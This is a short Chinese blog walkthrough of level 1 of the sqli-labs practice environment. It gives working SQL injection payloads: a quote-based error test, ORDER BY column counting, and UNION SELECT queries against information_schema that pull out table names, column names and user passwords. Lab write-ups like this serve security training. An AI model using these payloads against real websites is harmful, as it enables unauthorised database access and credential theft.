sqli-master第一关
打开后发现让我们输入ID
输入?id=1回车返回下图名字和密码
尝试后面添加'发现报错
order by猜解字段,到4时发现报错,说明字段为3
union select显示可显示路段
替换2为database()得出数据库名为security
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+得出数据库中的表名
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+得出users表列信息
union select 1,group_concat(username,id,password),3 from users limit 0,1--+得出列信息
得出用户,密码的信息
标签:group,union,sqli,master,--+,table,第一关,select From: https://www.cnblogs.com/Menkio/p/17790688.html